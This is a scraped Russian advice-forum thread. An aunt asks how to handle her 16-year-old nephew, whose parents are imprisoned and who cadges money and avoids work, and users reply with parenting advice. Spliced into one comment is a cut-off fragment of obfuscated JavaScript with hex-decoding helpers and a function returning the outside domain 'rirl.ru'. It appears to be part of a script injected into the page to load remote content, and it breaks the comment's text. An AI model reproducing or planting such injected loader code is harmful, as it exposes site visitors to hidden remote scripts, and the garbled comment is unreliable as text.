Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-07 21:22:31 от Гость
что написать парню на отношения 11 месяцев приятное?? ... Подробнее
Последний комментарий
История : Яркая ты бабочка души моей...
1 минуту назад2016-12-08 07:03:34 от Гость из Закарпатья
14699 молодец Все комментарии67617
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Советы
Комедия
вчера в 12:41:152016-12-07 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Советы - Нужен совет
Советы : Нужен совет     

Здравствуйте всем! Очень хотелось бы послушать ваши мнения, советы! Начну по порядку: есть у меня старший брат, сейчас он отбывает срок, у брата есть сын 16 лет, так получилось что и мама у него находится в местах не столь отдаленных. Племяш какое-то время жил у нас, теперь живет с другой бабушкой, но недалеко от нас, то есть видимся мы регулярно, и помогаем чем можем! В последнее время стала наблюдать за ним, что он хитрит в плане денег, а именно, возьмет у той бабушки, придет к моей маме у нее возьмет, и еще может мне позвонить спросить...на стрижку ему надо каждую неделю, на кафе, кино тоже надо, если едет на соревнования то даем все вместе. Когда я его спросила не хочешь ли ты поработать этим летом, все таки 16 лет уже( я помню пошла рабоать с 13 лет, по чужим документам) он мне ответил что работы нет, я говорю ну хотя бы листовки пораздовать? ответ был : еще бы я листовки какие-то не раздавал...Может я конечно преувеличиваю...но мне кажется растет у нас лентяй, и я не знаю как до него донести что работать надо, и в работе нет ничего стыдного, стыдно ходить и клянчить...С ним разговаривала...но от него только слышу "Ой, все, я пошел". Раньше он как-то прислушивался ко мне, а сейчас толи возраст дает о себе знать то ли что... Подскажите как себя вести в данной ситуации?

История дополнена: 16 июня в 00:07:27
     

Наткнулась сейчас на розыгрыш путевок в финлагерь, в подмосковье, и отправила от имени племяша заявку...теперь 2 дня ожидания)

65016
Другие Советы
(23)
Гостья
Гостья

14 июня 13:17:09
2016-06-14 13:17:09
Дает о себе знать воспитание бабушек, которые такое позволяют и воспитание родителей, которые сидят. Ничего не сделаете, можете спокойно поговорить и все. Он достаточно взрослый, что бы давать отчет своим действиям.
Ответить
Поддерживаю Да0 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
14 июня 13:28:15
2016-06-14 13:28:15

Я так понимаю у вашего племянника его родители обои сидят. Если это так, то парню не легко, у него по сути нет родителей, ещё к этому такой возраст подростковый. Ещё к этому ему возможно не удобно перед теми с кем он общаеться, что два его родителя сидят. Это может влиять на общение с девочками, так как к сожалению дети отвечают за ошибки родителей. Уверен что многие думают, особенно родителей друзей, знакомых что он тоже когда то пойдёт по стопам родителей. Хотя это не не всегда так. Ему 16 лет, да многим приходиться подрабатывать где то в таком возрасте, чтоб хотя бы как то обеспечить своё существование. Сейчас молодёж не много другая, им как говориться за падло делать какие то вещи, брать какую то работу, что подумают его друзья. С одной стороны вы просто все можете не давать ему деньги и тогда, он задумается на счёт работы. Но с другой стороны ему надо получить какое либо образование чтоб потом уже обеспечивать свою жизнь. В скором времени, он пойдёт в армию. Что бы кто не говорил, но армия то же учит жизни, и многие ребята возвращаются другими. Главное не давите на него постоянно, не известно чем может всё это закончиться.

Ответить
Поддерживаю Да2 / Нет0
@Lelik@
12904 @Lelik@
@Lelik@ offline
Репутация : 14609
Комментариев 158 13
14 июня 14:05:28
2016-06-14 14:05:28

Bert, Я то могу не давать, а вот бабушки не могут... ну вроде как же они откажут, у него и так все непросто... С ним я разговариваю всегда спокойно, просто раньше, когда он был помладше он ко мне прислушивался( разница в возрасте у нас небольшая-11 лет), я чувствовалал его уважение ко мне, а сейчас он включает игнор... меня это беспокоит, потому что я не хочу чтобы он шел по родительским стопам, я за него очень переживаю. Сейчас он поступает в педколледж-физрук. Занимается с 8 лет футболом, я его всегда поддерживала в этом, ездила к нему на тренировки, потому что как то раз он сказал, что вот к другим мама или папа приходят на тренировки... и я старалась при любом удобном случае или на игру, или на тренировку приходить. Мне не жалко на него денег, нет, просто он начал хитрить... и вот это его фраза еще бы я листовки раздавал...

Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 122664
Комментариев 1113 17
14 июня 14:48:56
2016-06-14 14:48:56

Я бы лично просто не давала ему денег и все. Сыт, обут и ладно. На кафе, кино можно и самому заработать, многие молодые люди пытаются приработать свою копеечку ! Возможности при желании можно найти- те же листовки раздавать, в огороде помогать пенсионерам,..... Долой свою гордость, нужно стремиться к самостоятельности. Это же так приятно, пусть и небольшие деньги - зато свои. Помню, лет в 12 у нас уже было желание работать. Мыли и сдавали бутылки, рвали укроп и прочую зелень (с разрешения родителей) и шли на рынок, продавали. Так же, помню, собирали и сдавали какие-то ненужные мелкие металлические предметы на деньги. Помню, как мечтали устроиться к кому-нибудь уборщиками, если бы взяли. То, что помогаете ему деньгами - молодцы! Но если он начинает хитрить, то поговорите с ним. Мне кажется, Ваш брат найдет массу причин, чтобы только не работать. Так ведь проще, прикрываясь причинами и возрастом, взять у кого-то денег. Было бы желание - нашел бы возможность. Либо пусть тогда без кино и кафе как-нибудь .

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да2 / Нет0
АлирА
АлирА

14 июня 14:50:04
2016-06-14 14:50:04
Не переживайте ! Просто у него появилась девочка и ему стало не хватать денег. Это возраст сейчас такой. А если его друзья увидят, раздающим листовки , то его засмеют . При этом ему и так не легко , как сыну заключённых . Не каждый родитель захочет , чтобы его сын или дочь общались с таким человеком. А на другую работу его сейчас скорее всего не возьмут. Хотя можно попробовать в какой-нибудь автосервис устроиться. Но и то очень врятли возьмут . Не переживайте !
Ответить
Поддерживаю Да0 / Нет0
Кучерявая
Кучерявая

14 июня 14:50:05
2016-06-14 14:50:05
Денег не давать. .. вот как Если заметили что хитрит. Значит надо так же резко перестать давать финансы И в пример родителей поставить
Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
14 июня 15:07:29
2016-06-14 15:07:29

Какой кошмар! Ему не стыдно просить у бабушек на кино и кафе? На мой взгляд даже у родителей просить на это не очень, ну, мне бы по крайней мере было не приятно, а у бабушки тем более стыдно. А какие у него стрижки каждую неделю? Он что уникум? Как у него волосы то так быстро отрастают каждую неделю? Это невозможно! Скорее всего берет каждую неделю на стрижку и прогуливает их просто!

Я считаю, что да, он у вас лентяй и лодырь, который привык жить на всем готовом, который не знает цену деньгам, потому что не зарабатывает их, а получает за просто так! Не давайте ему деньги на развлечения больше, накормлен и хватит, а на кофе и кино пусть сам зарабатывает, тем более не ребенок уже, как раз может и поймет цену деньгам, а то они падают с небес на него, он и не знает, а как это тяжело! Вот пусть узнает! А так он просто не хочет! А зачем ему работать, если он знает, что вы ему дадите? Вы так рискуете, что всю жизнь он будет с вас клянчить! Ну, а что? Раз дают, то почему бы не брать!

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
ника777
21248 ника777
Ника777 offline
Репутация : 115836
Комментариев 2147 3
14 июня 15:13:10
2016-06-14 15:13:10

Гены родителей никуда не денешь, все начинается с малого! Судьба боюсь печальна будет.... Хочет легкой жизни, растет без родителей, никто ему неуказ, все дозволено ему, все его холят и лелеят, вот и результат... Поговорите с родственниками, чтобы денег ему не давали! Да и с ним разъяснительную беседу надо провести, соглашусь с предыдущим комментарием- родителей в пример ставить надо, да и в 16 лет вряд ли куда возьмут, может грузчик или промоутер...

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
14 июня 15:16:56
2016-06-14 15:16:56

@Lelik@, Значит вам надо серьёзно поговорить с бабушками с дедушками и объяснить, что не к чему хорошему это не приведёт. Если он почувствует что через хитрость всё получается, то и в других случаях он будет использовать этот метод. Только если его ограничить от давание денег, он только тогда заинтересуются поиском работы.

Ответить
Поддерживаю Да1 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115836
Комментариев 2147 3
14 июня 15:18:38
2016-06-14 15:18:38

АлирА, Ага и хитрить начал из-за девчонки... Бред... А что тут такого если увидят его за раздачей листовок?? Многие сейчас ребята этим заняты, чтобы подзаработать, есть даже ребята на лето и в кафе официантами устраиваются, грузчики, в строительные бригады идут! У него ведь папы и мамы нет, они не могут ему денег дать, как другим, вот и трясет с бабушек... Да и вообще парню надо прививать ответственность за себя, уметь обращаться с деньгами, как они достаются, не с неба падая!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гостья
Гостья

14 июня 15:39:13
2016-06-14 15:39:13
ника777, При чем тут гены? Вон автор тоже имеет одни гены со своим братом, по вашему она тоже скоро в колонию пойдет? Тут дело не в генах, а в воспитании и все дозволенности.
Ответить
Поддерживаю Да0 / Нет0
Штучка
21311 Штучка
Штучка offline
Репутация : 42130
Комментариев 985 0
14 июня 15:51:31
2016-06-14 15:51:31
Практически никогда не ценится то, что достаётся без каких-либо усилий. Вы даёте племяннику деньги - зачем ему в таком случае напрягаться? Если бы, правда, хотел подзаработать, проявил бы, хотя бы, желание. Мои дети, например, с14 лет подрабатывали на летних каникулах, хотя их никто не гнал на работу. Просто клянчить каждый раз деньги на вечер считали ниже своего достоинства. Причём организовывали всё сами. При желании можно подобрать какие-то приемлемые варианты. Его содержат, жизненные потребности финансово обеспечивают, а на развлечения (на погулять) вы давать не обязаны вообще-то. Ещё неизвестно, как именно он тратит эти деньги, умеет ли он ими разумно распоряжаться. Этому тоже надо учиться. Сейчас у парня возраст крушения авторитетов, поэтому с ним трудно разговаривать. И уж, конечно, упоминать о криминальной судьбе его родителей - вообще недопустимо!
Ответить
Поддерживаю Да0 / Нет0
Видеть в чудесном чудесное - вот ключ ко всем тайнам мира. Лао - Цзы
@Lelik@
12904 @Lelik@
@Lelik@ offline
Репутация : 14609
Комментариев 158 13
14 июня 16:04:27
2016-06-14 16:04:27

Спасибо всем за комментраии и советы, со всеми согласна! Бабушкам я уже сказала, чтоб как можно реже давали ему денег- другая бабушка боится а вдруг воровать пойдет? Короче из крайности в крайность бросаются. Планирую с ним провести выходные-покататься на великах, и там поговорить еще раз. О родителях я никогда плохо не говорю при нем. Действительно хочу помочь ему , но не знаю как. Опыта у меня в этом нету(((

Ответить
Поддерживаю Да0 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115836
Комментариев 2147 3
14 июня 16:06:19
2016-06-14 16:06:19

Гостья, Гены- не исключение! Бывает доминирование генов, поэтому человек склонен к тому, что и его родители! Я буду только рада, если парень будет не такой как его родители!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
АлирА
АлирА

14 июня 18:45:05
2016-06-14 18:45:05
ника777, пропадёт уважение к нему. Будут чморить в колледже и обижать . Дети злые. Могу и быть начать . Знаю ситуацию, когда мальчика в костюме животного ( не буду писать какого, чтоб не поняли о каком заведении идёт речь) , раздававшего листовки , избили собственные одноклассники . Не давать тоже не вариант ! Просто общайтесь чаще с бабушками и дедушками, чтобы все кто даёт ему деньги точно знали кто сколько и на что даёт . А на счёт генов! Это бред!!!!!! Не забивайте себе этим голову!
Ответить
Поддерживаю Да0 / Нет2
х/з
х/з

14 июня 18:46:35
2016-06-14 18:46:35
Чтобы племянник почувствовал ценность денег-предложите ему работать у вас. Нагрузите его той работой, которую он обычно не делает. Парни, например, редко моют посуду, даже за собой. Предложите ему за каждую мойку рублей по 50-100 (ну это на ваше усмотрение), пропылесосить там за 150р. Ну вам виднее, короче. А вообще вроде в летние детские лагеря можно устроиться помощником воспитателя. И не унизительно, и отдохнет и заработает. А пока покупайте ему только что-то по мере необходимости и ограничивайте его. Например хочет он фирменную куртку, а вы купите примерно такую же, но дешевле, не брендовую(это я уже утрирую), намек-ты и на такую пока не заработал. То есть покупать ему все тоже, но дешевле, чтобы он ощутил разницу. И парикмахерскую сменить на эконом-класс. Только на живом примере парень что-то поймет.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

14 июня 18:46:39
2016-06-14 18:46:39

Добрый день!

Вы должны понимать, что на его поведение влияют разные факторы. Это и возраст , и сложившаяся в семье ситуация, и, возможно, влияние общества. Нельзя "вешать всех собак" на его лень, которая тоже, я думаю, присутствует.

Во-первых , начните с разговора с ним. Поговорите не как старший "родитель", а как женщина, постарайтесь стать с ним наравне. Объясните, какие поступки достойны мужчины, а какие нет, в чём та самая разница между мальчиком и мужем. Не давите на него с работой, он не обязан трудиться летом, хоть и следовало бы. Просто поговорите по душам, в нейтральной обстановке, постарайтесь стать ему другом .

Во-вторых , поговорите и с бабушкой. Чтобы она не резко, без скандалов, но чётко дала понять парню, что не может обеспечивать его развлечения. Может быть, стоит даже на жалость надавить: мол, пенсионерка уже, а цены на лекарства раз от разу всё выше и выше.

Искренне надеюсь, что что-то да изменится в Вашей ситуации, а мальчонка одумается. Вы бы отписались потом, как дела. Удачи Вам и успехов!

Ответить
Поддерживаю Да2 / Нет0
белая мышка
9141 белая мышка
Белая мышка offline
Репутация : 142710
Комментариев 1511 25
14 июня 19:24:29
2016-06-14 19:24:29

Листовки я бы тоже не пошла раздавать, стыдно) а вдруг кто увидит). Но в 16-17 лет сами на лето искали подработки для студентов на заводах и фабриках. Официантками устраивались. Все потому что денег никто не давал.

Сейчас времена другие. Мальчик уже обделен любовью и лаской родителей. Если от него и друзья отвернуться из-за того что он не сможет проводить с ними время:ходить в кино, кафе, купить какую-нибудь вкусняшку в супермаркете или МакДональдсе, он вообще замкнется.

Не стоит лишать его полностью корманных денег, просто установите определенный лимит на месяц. Хочет-сразу истратит, хочет-пусть тянет. Пусть бабушки будут в курсе кто сколько дал.

Ответить
Поддерживаю Да0 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Нина
Нина

15 июня 02:21:06
2016-06-15 02:21:06
Я не знаю Вашей ситуации - почему сидят родители, какая у него жизнь и тд и тп.. Но один вывод прямо напрашивается. Балуют его нещадно! Именно из-за того, что родители сидят, а он бедняга горемычится. Он - взрослый пацан в 16 лет. Может идти работать. Но зачем?? Вы все ему и так деньги даете. Знаю не понаслышке о детях из таких семей, даже из детдомов, у которых много спонсоров. Дети считают, что им все ОБЯЗАНЫ. это неверно. Да, печально сложилась жизнь, но работу, учебу все это не отменяет. Не идите на поводу. Вырастите урода ( в смысле моральных качеств)
Ответить
Поддерживаю Да1 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115836
Комментариев 2147 3
15 июня 11:44:13
2016-06-15 11:44:13

АлирА, Знаете, смеются над другими те, кто в семье обеспеченной живет и не знает, что такое зарабатыват деньги, а потом на все готовенькое приходят- в школе- медаль куплена, аттестат... В институте- диплом... И вырос человек не умеющий распоряжатся срествами и своим временем! Зато друзья не чмырили, о том что он не подрабатывал! Да, бросьте вы это! Всегда молодеж идет на подработки, и опять же не все! Я не хочу, конечно, со стопроцентной увереностью сказать, что гены решающий фактор в жизни человека, но все равно роль играют! Яблоко от яблони не далеко падает!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гость
Гость

16 июня 16:29:15
2016-06-16 16:29:15

Доброго Вам дня! А Вы поговорили с племянником-то, он согласен?

Ответить
Поддерживаю Да0 / Нет0
@Lelik@
12904 @Lelik@
@Lelik@ offline
Репутация : 14609
Комментариев 158 13
16 июня 16:51:25
2016-06-16 16:51:25

Felicità , Ну я отправила заявку, а потом ему сказала, так сказать перед фактом поставила, но он прям не против)Вот жду завтра...

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

17 июня 14:21:27
2016-06-17 14:21:27

Здравствуйте, @Lelik@ ! Перед фактом поставили? Мне это почему-то кажется неправильным, но слава Богу, что парень не против. Удачи вам обоим!

Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке